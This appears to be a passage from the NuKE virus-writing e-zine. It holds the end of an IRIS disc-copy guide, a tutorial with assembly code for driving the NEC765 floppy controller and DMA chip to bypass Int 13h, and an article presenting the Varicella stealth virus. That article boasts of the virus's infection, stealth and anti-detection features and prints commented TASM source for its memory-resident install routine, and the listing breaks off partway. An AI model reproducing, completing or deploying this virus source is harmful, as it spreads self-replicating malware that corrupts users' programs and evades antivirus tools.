PRESS RETURN WHEN READY TO GO ON

NOTE: ALL REQUESTED VALUES/CALCS IN OCTAL UNLESS OTHERWISE NOTED. ALL VALUES ON
DISC SPECIFICATION SHEETS ARE IN OCTAL.

ENTER THE FOLLOWING VALUES FOR THE SOURCE:
  ADDRESS OF THE SOURCE BZUD                              : 0
  COMPUTED VALUE OF SOURCE PHYU                           : 0
  STARTING CYLINDER NUMBER                                : 0
  BLOCK # IN THE CYL TO START COPYING FROM (ORIGIN 0)
    THIS IS NORMALLY ZERO                                 : 0
  SOURCE CONTROLLER'S DEVICE CODE                         : 0
  SOURCE DISC'S LRC                                       : 0
  NUMBER OF CYLINDERS TO COPY (REM TO GIVE IN OCTAL)      : 0

ENTER THE FOLLOWING VALUES FOR THE DESTINATION:
  ADDRESS OF THE DESTINATION BZUD                         : 0
  COMPUTED VALUE OF DESTINATION PHYU                      : 0
  STARTING CYLINDER                                       : 0
  BLOCK # IN THE CYL TO START COPYING TO (ORIGIN 0)       : 0
  DESTINATION CONTROLLER'S DEVICE CODE                    : 0

PRINT HERE OR $LPT (C/R OR $) : 0

RUN "MAKEBLOCKCOPY", WHEN FINISHED ENTER THE FOLLOWING COMMAND:

  #SHUTDOWN [PASSWORD] BLOCKCOPY @73000,X73000

USE DBUG TO SET UP THE FOLLOWING LOCATIONS:
  200 : 0     201 : 0     202 : 0     203 : 0
  204 : 0     205 : 0     206 : 0     207 : 0
  210 : 0     211 : 0     212 : 0     213 : 176346

PRESS RETURN WHEN READY TO GO ON 0

THEN J410 (OR RESET & START AT 410) TO START THE COPY

RULES FOR BLOCKCOPY:

ADDRESS   FUNCTION
  400     BAD HALT
  401     NOT USED
  402     NOT USED
  410     START COPY
  411     START VERIFY
  412     START DISC PATTERN GENERATOR
  413     START DISC PATTERN VERIFICATION
  414     RETRY CURRENT BLOCK/IF SUCCESSFUL, RESUME-NO LOSS
  415     SKIP CURRENT BLOCK/GO TO NEXT BLOCK - BLOCK LOST
  416     START INFINITE DISC PATTERN TEST

PRESS CR TO CONTINUE DISPLAY OF RULES

HALTS:
  63077   INDICATES A SUCCESSFUL COMPLETION
  63377   WRONG VALUE(S) IN TABLE STARTING AT 200
  67077   READ ERROR
  73077   WRITE ERROR
  63277   VERIFY ERROR IN CORE COMPARE

ON READ OR WRITE ERROR, CHECK THE FOLLOWING CELLS:
  260 = CURRENT SOURCE RDA
  261 = CURRENT DEST RDA
  262 = CURRENT DISC STATUS

NO AUTOMATIC
RETRIES ARE DONE. ON A BAD BLOCK, THERE ARE OPTIONAL RESTARTS AT LOC 414 & 415
(SEE ABOVE)
-=-

You can also edit individual text files and configuration files with the text editors. The names of these differ on every system I've called.

% CONCLUSION %
~~~~~~~~~~~~~~

I hope this serves a useful purpose. I still can't understand why IRIS, which is extremely easy to use and very common, hasn't had a good article written about it in a very long time.

================================================================================
================================================================================
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
      "Programming the NEC765 Floppy Disk Controller and the DMA Chip
                         to bypass Int 13h"
                               By Dr. X
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu

% The Challenge %
~~~~~~~~~~~~~~~~~

The challenge was started by Dr. X in order to access the disk media without using any DOS or BIOS Interrupt 13h calls. Surely a _very_ difficult challenge indeed; nevertheless Dr. X has succeeded in doing so, and he will explain the theory behind his development. This scholar does deserve a `pat on the back' for his brain-teaser work. Good work Dr. X, and welcome aboard.

NuKE Members/Supporters

% Programming the Floppy Disk Controller & DMA chip to bypass the Int 13h %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The NEC 765 floppy disk controller chip controls the floppy disk drives' motors and heads,
and it manages the flow of data to and from the disk sector(s). The FDC (Floppy Disk Controller) performs 15 operations in all, of which only three are discussed here: Seek, Read and Write.

The FDC operates in three phases:

   1) The command phase   : one or more command bytes are written to the Data Register
   2) The execution phase : the FDC carries out the command (the sector data moves by DMA)
   3) The result phase    : a number of status bytes are read back from the Data Register

% I) The Ports %
~~~~~~~~~~~~~~~~~

The FDC is operated through only three I/O (Input/Output) ports:

   3F2h - Digital Output Register (DOR)
   3F4h - Main Status Register
   3F5h - Data Register

1. Digital Output Register (3F2h)

   Bits   Function
   1-0    Drive select: 00=A, 01=B, 10=C, 11=D
   2      0=Reset the floppy disk controller (***)
   3      1=Enable the FDC interrupt (IRQ 6) and DMA access
   7-4    1=Turn ON the motor of drive D..A (bit 4 = drive A, bit 5 = drive B, ...)

   Warning: This register is WRITE ONLY.
   (***) Keep bit 2 set at all times while working: clearing it resets the
         controller, after which the drive has to be recalibrated before it
         can be used again.

2. Data Register (3F5h)

   Operation      Byte #   Function
   Seek           1        Command code (0Fh)
                  2        Head & Drive: 00000HDD (H=head, DD=drive)

   Read Sector    1        Command code (66h)
                  2        Head & Drive: 00000HDD (H=head, DD=drive)
                  3        Track number
                  4        Head number
                  5        Sector number
                  6        Bytes-per-sector code (2=512)
                  7        End of track, the last sector number on the track (09h on a 360K disk)
                  8        Gap length
                  9        Data length

   Write Sector   1        Command code (45h)
                  2-9      Same as READ SECTOR (above)

   Warning: You must be sure that the FDC is ready before you send or read a byte through the Data Register. Bits 7-6 of the Main Status Register provide this information.

3. Main Status Register (3F4h)

   Bits   Function
   3-0    1=Disk drive D..A is in seek mode
   4      1=FDC read or write command in progress (controller busy)
   5      1=FDC is in the execution phase in non-DMA mode
   6      1=FDC Data Register has a byte for the CPU (read it)
          0=FDC Data Register is ready to receive a byte from the CPU
   7      1=FDC ready to send or receive a byte (RQM)

   Warning: When a seek operation is complete, the FDC raises IRQ 6, the diskette hardware interrupt (vector INT 0Eh).
When the interrupt occurs, the BIOS interrupt handler sets bit 7 of the diskette status byte in the BIOS Data Area at 0040:003Eh. That is the sole result of the interrupt, so a program can poll that bit to find out when the seek (or the read/write) has finished.

% II) Initializing %
~~~~~~~~~~~~~~~~~~~~~

Before programming the DMA channel, the program must tell the DMA chip whether it is reading from or writing to the Floppy Disk Controller. This one-byte mode code is 46h for a read (FDC to memory) and 4Ah for a write (memory to FDC). It is written to port 0Bh, the DMA mode register; a write to port 0Ch resets the byte-pointer flip-flop so that the address and count bytes that follow are taken low byte first. After that you can send the parameters to the Data Register (3F5h), following the steps below:

1. Turn on the floppy disk motor (enable interrupts with STI first):
   a) Out the code byte to the Digital Output Register (3F2h).
   b) Send 46h (read) or 4Ah (write) to the DMA mode register, port 0Bh, and write to port 0Ch to clear the flip-flop (eg: Out 0Bh,46h then Out 0Ch,46h; the value written to 0Ch does not matter).

2. Then you _must_ perform a seek operation to the head and track concerned:
   a) Out the code for the Seek operation (0Fh) to the FDC (3F5h)
   b) Out the head & drive code (00000HDDxB, H=head, DD=drive)
   c) Out the track number
   d) Wait for the IRQ 6 interrupt (bit 7 of 0040:003Eh)

3. After that you can perform the read or write operation(s):
   a) Calculate the 20-bit address of the buffer, segment*16 + offset (see the program at the end of this article)
   b) Send it to the DMA: low byte then high byte of the address to port 04h, the top four bits to the page register at port 81h, the byte count minus one (low, high) to port 05h, and finally 02h to port 0Ah to unmask channel 2
   c) Out the value 66h for read or 45h for write to the FDC (3F5h)
   d) Out the head & drive number
   e) Out the track number
   f) Out the head number
   g) Out the sector number
   h) Out the sector size code
   i) Out the end-of-track sector number
   j) Out the gap length
   k) Out the data length
      Bytes h) to k) come from the BIOS diskette parameter table: get its address with INT 21h, AX=351Eh (get interrupt vector 1Eh); ES:BX then points to the table, with the sector size code at offset 3, end-of-track at offset 4, gap length at offset 5 and data length at offset 6.
   l) Wait for the IRQ 6 interrupt
   m) Perform 7 INs from the Data Register (3F5h) to get the status bytes (refer to Part III)

4. Finally, turn off the motor(s):
   a) Out the code byte to the Digital Output Register (3F2h)

% III) The Status Bytes %
~~~~~~~~~~~~~~~~~~~~~~~~~

After a read or write operation the FDC gives you 7 status bytes:

   Byte #   Function
   1        Status Byte 0
   2        Status Byte 1
   3        Status Byte 2
   4        Track number
   5        Head number
   6        Sector number
   7        Bytes-per-sector code (0-3)
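The two pieces of the procedure above that are easy to get wrong off-line are the DMA address calculation of step 3 and the reading of the result phase. The following C is an added example, not Dr. X's code: dma_channel2_setup() produces the bytes a DOS program would OUT to ports 04h, 81h and 05h for a real-mode buffer, and refuses a buffer that straddles a 64 KiB DMA page (the 8237 never carries into the page register, so such a transfer wraps onto the wrong memory; the article's ROL/ADD sequence does not check for it); fdc_decode_result() interprets the 7 result bytes of Part III. The buffer address and the two result dumps in main() are constructed, not captured from hardware, and nothing here touches an I/O port.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Real-mode segment:offset -> 20-bit physical address (DS*16 + offset). */
uint32_t phys_addr(uint16_t seg, uint16_t off)
{
    return ((uint32_t)seg << 4) + off;
}

typedef struct {
    bool    ok;        /* false: zero length or transfer crosses a 64 KiB page */
    uint8_t addr_lo;   /* OUT 04h, first  (flip-flop cleared via 0Ch beforehand) */
    uint8_t addr_hi;   /* OUT 04h, second */
    uint8_t page;      /* OUT 81h: address bits 19-16 */
    uint8_t count_lo;  /* OUT 05h, first : (bytes - 1) low byte */
    uint8_t count_hi;  /* OUT 05h, second */
} dma_setup_t;

dma_setup_t dma_channel2_setup(uint16_t seg, uint16_t off, uint16_t bytes)
{
    dma_setup_t s = {0};
    if (bytes == 0)
        return s;                                  /* nothing to transfer */
    uint32_t first = phys_addr(seg, off);
    uint32_t last  = first + bytes - 1;
    s.addr_lo  = (uint8_t)(first & 0xFF);
    s.addr_hi  = (uint8_t)((first >> 8) & 0xFF);
    s.page     = (uint8_t)((first >> 16) & 0x0F);
    s.count_lo = (uint8_t)((bytes - 1) & 0xFF);
    s.count_hi = (uint8_t)(((bytes - 1) >> 8) & 0xFF);
    /* The 8237 only increments its 16-bit address; the page register is
     * fixed for the whole transfer, so first and last byte must share it. */
    s.ok = ((first >> 16) == (last >> 16));
    return s;
}

/* ST0 bits 7-6, the interrupt code of Part III, Status Byte 0. */
enum { FDC_OK = 0, FDC_ABNORMAL = 1, FDC_INVALID_CMD = 2, FDC_NOT_READY = 3 };

typedef struct {
    uint8_t int_code;          /* ST0 bits 7-6 */
    bool    seek_end;          /* ST0 bit 5 */
    bool    equipment_check;   /* ST0 bit 4 */
    bool    not_ready;         /* ST0 bit 3 */
    uint8_t head, unit;        /* ST0 bit 2, bits 1-0 */
    bool    end_of_cylinder;   /* ST1 bit 7: sector beyond the last one */
    bool    crc_error;         /* ST1 bit 5 */
    bool    overrun;           /* ST1 bit 4: DMA did not keep up */
    bool    no_data;           /* ST1 bit 2: sector not found */
    bool    write_protect;     /* ST1 bit 1 */
    bool    missing_am;        /* ST1 bit 0 */
    bool    crc_in_data;       /* ST2 bit 5 */
    bool    wrong_cylinder;    /* ST2 bit 4 */
    bool    bad_cylinder;      /* ST2 bit 1 */
    uint8_t cyl, hd, sector, size_code;   /* result bytes 4-7 */
} fdc_result_t;

fdc_result_t fdc_decode_result(const uint8_t r[7])
{
    fdc_result_t d;
    d.int_code        = r[0] >> 6;
    d.seek_end        = r[0] & 0x20;
    d.equipment_check = r[0] & 0x10;
    d.not_ready       = r[0] & 0x08;
    d.head            = (r[0] >> 2) & 1;
    d.unit            = r[0] & 3;
    d.end_of_cylinder = r[1] & 0x80;
    d.crc_error       = r[1] & 0x20;
    d.overrun         = r[1] & 0x10;
    d.no_data         = r[1] & 0x04;
    d.write_protect   = r[1] & 0x02;
    d.missing_am      = r[1] & 0x01;
    d.crc_in_data     = r[2] & 0x20;
    d.wrong_cylinder  = r[2] & 0x10;
    d.bad_cylinder    = r[2] & 0x02;
    d.cyl = r[3]; d.hd = r[4]; d.sector = r[5]; d.size_code = r[6];
    return d;
}

/* A read is only good on normal termination with no error flag raised. */
bool fdc_read_ok(const uint8_t r[7])
{
    fdc_result_t d = fdc_decode_result(r);
    return d.int_code == FDC_OK && !d.crc_error && !d.overrun && !d.no_data
        && !d.missing_am && !d.crc_in_data && !d.wrong_cylinder;
}

int main(void)
{
    /* Constructed inputs: a 512-byte buffer at 1A2Bh:0103h and two result
     * dumps in the layout of Part III (not captured from a real drive). */
    dma_setup_t s = dma_channel2_setup(0x1A2B, 0x0103, 512);
    printf("page %02X addr %02X%02X count %02X%02X ok=%d\n",
           s.page, s.addr_hi, s.addr_lo, s.count_hi, s.count_lo, s.ok);
    const uint8_t good[7] = {0x01, 0x00, 0x00, 1, 0, 3, 2};
    const uint8_t bad[7]  = {0x41, 0x04, 0x00, 1, 0, 3, 2};  /* abnormal, no data */
    printf("good=%d bad=%d\n", fdc_read_ok(good), fdc_read_ok(bad));
    return 0;
}
```

For the constructed buffer the physical address is 1A3B3h, so the page register gets 01h, port 04h gets B3h then A3h, and port 05h gets FFh then 01h (511, the byte count minus one). A buffer at 1FF0h:0080h with 512 bytes is rejected, because it runs from 1FF80h into page 2.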
1. Status Byte 0 (ST0)

   Bit #   Function
   7-6     00=normal termination
           01=execution began but could not complete (abnormal termination)
           10=invalid command
           11=failed because the disk drive went not-ready
   5       1=seek completed (Seek End)
   4       1=disk drive fault (equipment check)
   3       1=disk drive not ready
   2       number of the selected head
   1-0     number of the selected drive

2. Status Byte 1 (ST1)

   Bit #   Function
   7       1=requested sector beyond the last sector number
   6       always 0
   5       1=data transfer error (CRC error)
   4       1=data overrun (the DMA did not keep up)
   3       always 0
   2       1=cannot read or find the sector
   1       1=cannot write because of the write-protect tab
   0       1=missing address mark in the disk format

3. Status Byte 2 (ST2)

   Bit #   Function
   7       always 0
   6       1=encountered a deleted-data address mark
   5       1=CRC error in the data field
   4       1=track identification problem (wrong cylinder)
   3       1=scan command condition satisfied
   2       1=scan command condition NOT satisfied
   1       1=bad track
   0       1=missing address mark in the data field

% IV) Read Procedure in ASM (for the A86 assembler) %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

; Reads one sector (drive B:, head 0, track 1, sector 3) into Buffer through
; the NEC765 and DMA channel 2, without Int 13h.  A86 assembler syntax.

        Jmp   TheCode
Buffer        Db 512 Dup (0)          ; For the sector
StatusBuffer  Db 7 Dup (7)            ; For the 7 result bytes

TheCode Proc Near
ReadSector:
        ; Select drive B: and turn its motor ON
        Sti
        Mov   Dx,03F2H
        Mov   Al,00101101xB           ; Bits 0,2,3,5: drive 1 (B:), no reset, IRQ/DMA enable, motor B on
        Out   Dx,Al
        ; Seek to the track (this also gives the motor time to come up to speed),
        ; then a short extra delay
        Call  Motor_Delay
        Mov   Cx,2000
        Loop  $
        ; Initialise DMA channel 2 for a read (FDC -> memory)
        Mov   Al,46H                  ; Single mode, address increment, write to memory, channel 2
        Out   0BH,Al                  ; DMA mode register
        Out   0CH,Al                  ; Any write here clears the byte-pointer flip-flop
        ; Compute the 20-bit physical address of Buffer: DS*16 + offset
        Lea   Ax,Buffer
        Mov   Bx,Ds
        Mov   Cl,4
        Rol   Bx,Cl                   ; The top nibble of DS lands in bits 3-0
        Mov   Dl,Bl
        And   Dl,0FH                  ; DL = page (address bits 19-16)
        And   Bx,0FFF0H               ; BX = (DS*16) mod 64K; the original omitted this mask
        Add   Ax,Bx                   ; AX = low 16 bits of the address
        Jnc   NoCarry
        Inc   Dl                      ; Carry into the page register
NoCarry:
        Out   04H,Al                  ; Channel 2 base address, low byte
        Mov   Al,Ah                   ; (no "Dec Al" here: the count, not the address, is length-1)
        Out   04H,Al                  ; Channel 2 base address, high byte
        Mov   Al,Dl
        Out   81H,Al                  ; Channel 2 page register
        Mov   Ax,511                  ; Count = bytes - 1
        Out   05H,Al                  ; Channel 2 count, low byte
        Mov   Al,Ah
        Out   05H,Al                  ; Channel 2 count, high byte
        Mov   Al,2
        Out   0AH,Al                  ; Single mask register: unmask channel 2
        ; Get ES:BX -> BIOS diskette parameter table (interrupt vector 1Eh)
        Mov   Ax,351EH
        Int   21H
        ; Send the READ DATA command bytes
        Mov   Ah,066H                 ; MFM, skip deleted data, READ DATA
        Call  Out_FDC                 ; Send it
        Mov   Ah,1                    ; Head 0, drive 1 (B:); must match the DOR above
        Call  Out_FDC
        Mov   Ah,1                    ; Track number
        Call  Out_FDC
        Mov   Ah,0                    ; Head number
        Call  Out_FDC
        Mov   Ah,3                    ; Sector number
        Call  Out_FDC
        Mov   Ah,Es:[Bx]+3            ; Sector size code (2 = 512 bytes)
        Call  Out_FDC
        Mov   Ah,Es:[Bx]+4            ; End-of-track (last sector number)
        Call  Out_FDC
        Mov   Ah,Es:[Bx]+5            ; Gap length
        Call  Out_FDC
        Mov   Ah,Es:[Bx]+6            ; Data length
        Call  Out_FDC
        Call  Wait_Interrupt          ; Wait for IRQ 6
        ; Read the 7 result bytes
        Mov   Cx,7
        Lea   Bx,StatusBuffer
Next:   Call  In_FDC
        Mov   [Bx],Al
        Inc   Bx
        Loop  Next
        ; Turn OFF the motor
        Mov   Dx,03F2H
        Mov   Al,00001101xB           ; Motors off, keep IRQ/DMA enable and no-reset
        Out   Dx,Al
        Ret                           ; Exit from the program
TheCode Endp

Wait_Interrupt Proc
        ; Poll bit 7 of the BIOS diskette status byte at 0040:003E, which the
        ; BIOS IRQ 6 handler sets, then clear it again for the next operation.
        ; Needs interrupts enabled and the BIOS handler in place (normal under DOS).
        Mov   Ax,40H
        Mov   Es,Ax
        Mov   Bx,3EH
Again:  Mov   Dl,Es:[Bx]
        Test  Dl,080H
        Jz    Again
        And   Dl,07FH                 ; The original cleared AL here instead of DL
        Mov   Es:[Bx],Dl
        Ret
Wait_Interrupt Endp

Out_FDC Proc Near
        ; Wait for RQM (bit 7 of the Main Status Register), then write AH
        ; to the Data Register
        Mov   Dx,03F4H
Keep_Trying:
        In    Al,Dx
        Test  Al,128
        Jz    Keep_Trying
        Inc   Dx
        Mov   Al,Ah
        Out   Dx,Al
        Ret
Out_FDC Endp

In_FDC Proc Near
        ; Wait for RQM, then read one byte from the Data Register into AL
        Mov   Dx,03F4H
Keep_Trying2:
        In    Al,Dx
        Test  Al,128
        Jz    Keep_Trying2
        Inc   Dx
        In    Al,Dx
        Ret
In_FDC Endp

Motor_Delay Proc
        ; Despite the name, this issues the SEEK to the target track
        Mov   Ah,0FH                  ; SEEK command
        Call  Out_FDC
        Mov   Ah,1                    ; Head 0, drive 1 (B:)
        Call  Out_FDC
        Mov   Ah,1                    ; Track number
        Call  Out_FDC
        Call  Wait_Interrupt
        Mov   Ah,08H                  ; SENSE INTERRUPT STATUS: the 765 requires this after
        Call  Out_FDC                 ; a SEEK, otherwise it treats the next command as invalid
        Call  In_FDC                  ; ST0
        Call  In_FDC                  ; Present cylinder number
        Ret
Motor_Delay Endp

--------------------------------------------------------------------------------
; Below is yet another example, this time for reading the first few tracks,
; which the author describes as being for the hard disk.
; By X
; Not `fully completed', but enough to get the point.
; Note that, as written, it still talks to the floppy controller at 3F2h-3F5h
; and reads drive 0, track 12, head 0, sector 3, i.e. a diskette in A:; a hard
; disk hangs off a different controller and is not driven by the NEC765.
        Jmp   TheCode
Buffer        Db 512 Dup (0)          ; For the sector
StatusBuffer  Db 7 Dup (7)            ; For the 7 result bytes

TheCode Proc Near
ReadSector:
        ; Select drive A: and turn its motor ON
        Sti
        Mov   Dx,03F2H
        Mov   Al,00011100xB           ; Bits 2,3,4: drive 0 (A:), no reset, IRQ/DMA enable, motor A on
        Out   Dx,Al                   ; (the original used 2Dh here, which selects drive B:)
        ; Seek to the track (also lets the motor come up to speed), then a short delay
        Call  Motor_Delay
        Mov   Cx,2000
        Loop  $
        ; Initialise DMA channel 2 for a read (FDC -> memory), as in the first listing
        Mov   Al,46H
        Out   0BH,Al                  ; DMA mode register
        Out   0CH,Al                  ; Clear the byte-pointer flip-flop
        ; Compute the 20-bit physical address of Buffer: DS*16 + offset
        Lea   Ax,Buffer
        Mov   Bx,Ds
        Mov   Cl,4
        Rol   Bx,Cl
        Mov   Dl,Bl
        And   Dl,0FH                  ; DL = page
        And   Bx,0FFF0H               ; BX = (DS*16) mod 64K
        Add   Ax,Bx
        Jnc   NoCarry
        Inc   Dl
NoCarry:
        Out   04H,Al                  ; Base address, low byte
        Mov   Al,Ah
        Out   04H,Al                  ; Base address, high byte
        Mov   Al,Dl
        Out   81H,Al                  ; Page register
        Mov   Ax,511                  ; Count = bytes - 1
        Out   05H,Al
        Mov   Al,Ah
        Out   05H,Al
        Mov   Al,2
        Out   0AH,Al                  ; Unmask channel 2
        ; Get ES:BX -> BIOS diskette parameter table
        Mov   Ax,351EH
        Int   21H
        ; Send the READ DATA command bytes
        Mov   Ah,066H                 ; READ DATA, MFM
        Call  Out_FDC
        Mov   Ah,0                    ; Head 0, drive 0 (A:)
        Call  Out_FDC
        Mov   Ah,12                   ; Track number
        Call  Out_FDC
        Mov   Ah,0                    ; Head number
        Call  Out_FDC
        Mov   Ah,3                    ; Sector number
        Call  Out_FDC
        Mov   Ah,Es:[Bx]+3            ; Sector size code (2 = 512 bytes)
        Call  Out_FDC
        Mov   Ah,Es:[Bx]+4            ; End-of-track
        Call  Out_FDC
        Mov   Ah,Es:[Bx]+5            ; Gap length
        Call  Out_FDC
        Mov   Ah,Es:[Bx]+6            ; Data length
        Call  Out_FDC
        Call  Wait_Interrupt          ; Wait for IRQ 6
        ; Read the 7 result bytes
        Mov   Cx,7
        Lea   Bx,StatusBuffer
Next:   Call  In_FDC
        Mov   [Bx],Al
        Inc   Bx
        Loop  Next
        ; Turn OFF the motor
        Mov   Dx,03F2H
        Mov   Al,12                   ; 0Ch: motors off, drive 0, keep IRQ/DMA enable and no-reset
        Out   Dx,Al
        Ret                           ; Exit from the program
TheCode Endp

Wait_Interrupt Proc
        ; Poll bit 7 of the BIOS diskette status byte at 0040:003E, then clear it
        Mov   Ax,40H
        Mov   Es,Ax
        Mov   Bx,3EH
Again:  Mov   Dl,Es:[Bx]
        Test  Dl,080H
        Jz    Again
        And   Dl,07FH                 ; Clear the flag for the next operation
        Mov   Es:[Bx],Dl
        Ret
Wait_Interrupt Endp

Out_FDC Proc Near
        ; Wait for RQM, then write AH to the Data Register
        Mov   Dx,03F4H
Keep_Trying:
        In    Al,Dx
        Test  Al,128
        Jz    Keep_Trying
        Inc   Dx
        Mov   Al,Ah
        Out   Dx,Al
        Ret
Out_FDC Endp

In_FDC Proc Near
        ; Wait for RQM, then read one byte from the Data Register into AL
        Mov   Dx,03F4H
Keep_Trying2:
        In    Al,Dx
        Test  Al,128
        Jz    Keep_Trying2
        Inc   Dx
        In    Al,Dx
        Ret
In_FDC Endp

Motor_Delay Proc
        ; Issues the SEEK to track 12 on drive 0
        Mov   Ah,0FH                  ; SEEK command
        Call  Out_FDC
        Mov   Ah,0                    ; Head 0, drive 0
        Call  Out_FDC
        Mov   Ah,12                   ; Track number
        Call  Out_FDC
        Call  Wait_Interrupt
        Mov   Ah,08H                  ; SENSE INTERRUPT STATUS, required after a SEEK
        Call  Out_FDC
        Call  In_FDC                  ; ST0
        Call  In_FDC                  ; Present cylinder number
        Ret
Motor_Delay Endp

================================================================================
================================================================================
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
                  "The Varicella Virus Source Codes"
                            By Rock Steady
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu

Ahh, NuKE PoX viruses will never end... Well, I noticed a few flaws and faults in the code of the old NuKE PoX virus version 2.0 which I wanted to refine. This time I had a lot of time, and I _fully_ commented the source code.

% Improvements %
~~~~~~~~~~~~~~~~

The most major improvement is the infection routine: I have created a generic method that always uses the same infection/disinfection routine. If you remember NuKE PoX v2.0, you noticed that I copied whole blocks of code twice, which gave the virus a size of 1800 bytes! This version hovers at 1483 bytes, and it's far from tight, but it's EXTREMELY reliable, meaning this baby should never crash for any reason. And it has _many_ added features that N-Pox v2.0 didn't have!
% Introduction to the ideology of the Stealth Virus %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Like the SVC viruses, this virus will `disinfect' on the fly. And to the DIMWIT who said SVC doesn't disinfect by rewriting the program on disk: GO CHECK YOUR INFO, NITWIT. The SVC viruses disinfect a file when it is opened; the SVC virus actually removes the virus from the infected program. It does NOT attempt a disinfection in memory only! It does have the ability to do that to a certain extent: if you execute the file and then jump towards the end of it with Int21h/4202h, the SVC virus will fool DOS into thinking that the file is not infected, whereas it really is. But this method has a MAJOR flaw, and F-Prot anti-virus exercises that flaw to defeat this dumb method. The flaw is that these viruses _cannot_ keep track of file pointers; it would take too much code to do so. So if you read a file from the beginning and read sequentially toward the end, sure enough you will encounter the SVC virus, because it has no way of tracking the file pointer. In order to fix this, SVC does a _real_ disinfection of the file on disk. Therefore in all respects the file will look clean, as it _is_ clean! Also note that the SVC viruses infect system device drivers as well; this is _rarely_ noted, maybe because people use VSUM as a reference?

% Varicella Features %
~~~~~~~~~~~~~~~~~~~~~~

The virus will only infect generic .com and .exe files. I have removed the .ovl infection because of certain crashes that persist with certain large programs. No virus to date does this successfully, for some reason.

The virus hides its file length from the FCB directory functions (Int21h/ah=11h,12h) and from the file-handle (ASCIIZ) find functions (Int21h/ah=4Eh,4Fh). It disinfects a file on open and on extended open (Int21h/ah=3Dh,6Ch). It also disinfects files as they are executed (Int21h/ah=4Bh) and reinfects them once they have terminated.
The virus infects on close (Int21h/ah=3Eh), using the very sophisticated Job File Table method (through the List of Lists). Infection is marked by setting the seconds field of the file's time stamp equal to the day of the month! This method is _a lot_ better than setting the seconds field to 60 or 62, because many AV programs flag an invalid seconds field. Now the seconds field holds a number from 1 to 31 (the days in a month), with only a 6% chance of an invalid seconds stamp: DOS stores seconds in two-second units, 0 to 29, so only days 30 and 31 (2 of 31) produce an invalid value. Also, so as not to create problems, the last two bytes of the virus _must_ be DBh,DBh. The virus therefore uses TWO methods of detecting infection, because we wouldn't want to `disinfect' a file that isn't infected; we must be 100% sure. I found it no use to have a `fake' disinfection routine, one that only pretends to disinfect, because that method contains several flaws. And testing this virus on my PC with a 40 Meg MFM 65ms drive showed _very_ little sign of abnormality. Speed-wise it's very fast; what is 1-2 milliseconds more (a couple of thousandths of a second)? When disinfecting a file, the virus even puts back the original seconds field of the time stamp, leaving absolutely no trace of its existence! How many viruses do that? Huh?

% To Come %
~~~~~~~~~~~

Well, I already have a multi-partition version of this virus, and I'm currently trying to add NED polymorphic possibilities to it. This will be a nice task, as NED is variable in length, therefore I have to save the original file length, or I will fix NED to be constant in length. Nevertheless you should see it coming soon.

% About the Name %
~~~~~~~~~~~~~~~~~~

Well, I didn't want to call this N-Pox, because it has NO code similarities with N-Pox; the only thing they share is the method of going resident. I called this "Varicella" because Varicella is the medical term for the chicken pox that adults get! When a child gets the pox, you call it chicken pox; when an adult gets it, you call it Varicella!
So I found it appropriate to call this Varicella because it is perhaps the `adult' or later outcome of the N-Pox virus.

;=================================================================
; (c) NuKE Software Development 1991, 1992, 1993
;
; VARICELLA VIRUS (Size 1483)
;
; By Rock Steady
;
; TASM VARICELL;
; TLINK/T VARICELL;
;

virus_size      equ     last - init_virus       ;virus size (bytes)
mut1            equ     3
mut2            equ     1
mut3            equ     103h                    ;offset in memory

seg_a           segment byte public
                assume  cs:seg_a,ds:seg_a
                org     100h                    ;compile to .com
start:
                jmp     init_virus
;-------------------------------------------------------------------------------
init_virus:
                call    doit_now                ;begin virus
doit_now:
                pop     bp                      ;pop call offset
                sub     bp,offset doit_now      ;fix it with pointer
                push    ax                      ;save registers
                push    ds
                push    es
                mov     ax,0abcdh               ;check if virus is
                int     13h                     ;alive in memory
                jmp     next_code1              ;force jump
virus_here:
                jmp     exit_com                ;error jump exit
next_code1:
                cmp     bx,0abcdh               ;cmp bx if virus alive
                jnz     install_virus
                jmp     virus_here              ;yes, skip memory part
install_virus:
                push    bx                      ;save registers
                push    cx
                push    dx
                push    si
                push    di
                push    ds
                xor     dx,dx                   ;0 value to dx
                mov     ds,dx                   ;put that in ds
                les     si,dword ptr ds:[0084h] ;get int21 vector
                mov     word ptr cs:[int21][bp],si      ;save int21 offset
                mov     word ptr cs:[int21+2][bp],es    ;save int21 segment
                les     si,dword ptr ds:[0070h] ;get int1c vector
                mov     word ptr cs:[int1c][bp],si      ;save int1c offset
                mov     word ptr cs:[int1c+2][bp],es    ;save int1c segment
                les     si,dword ptr ds:[004ch] ;get int13 vector
                mov     word ptr cs:[int13][bp],si      ;save int13 offset
                mov     word ptr cs:[int13+2][bp],es    ;save int13 segment
                pop     ds                      ;DS=PSP (.exe only)
                push    ds                      ;save DS
                mov     ax,ds                   ;ax=psp
                dec     ax                      ;dec ax, ax=mcb
                mov     es,ax                   ;es=ax, mcb
                mov     bx,es:mut1              ;bx=es:0003, mem size
                mov     dx,virus_size           ;dx=virus size (bytes)
                mov     cl,4
                shr     dx,cl                   ;convert bytes to paragraphs
                add     dx,4                    ;paragraphs + 1
                mov     cx,es                   ;cx=psp segment
                sub     bx,dx                   ;sub virus size from
                inc     cx                      ;new mem address
                mov     es,cx                   ;new segment
                mov     ah,4ah                  ;set the block size
                int     21h
                jc      exit_mem
                mov     ah,48h
                dec     dx                      ;alloc the mem
                mov     bx,dx                   ;bx=# of para blocks
                int     21h
                jc      exit_mem
                dec     ax                      ;new segment add
                mov     es,ax                   ;ax=es=mcb
                mov     cx,8h                   ;DOS is the owner
                mov     es:mut2,cx              ;put it in mcb
                sub     ax,0fh
                mov     di,mut3                 ;new offset to go
                mov     es,ax                   ;es=segment
                mov     si,bp                   ;add delta offset
                add     si,offset init_virus    ;beginning of virus
                mov     cx,virus_size           ;our size
                push    cs                      ;get the correct
                pop     ds                      ;segment in ds
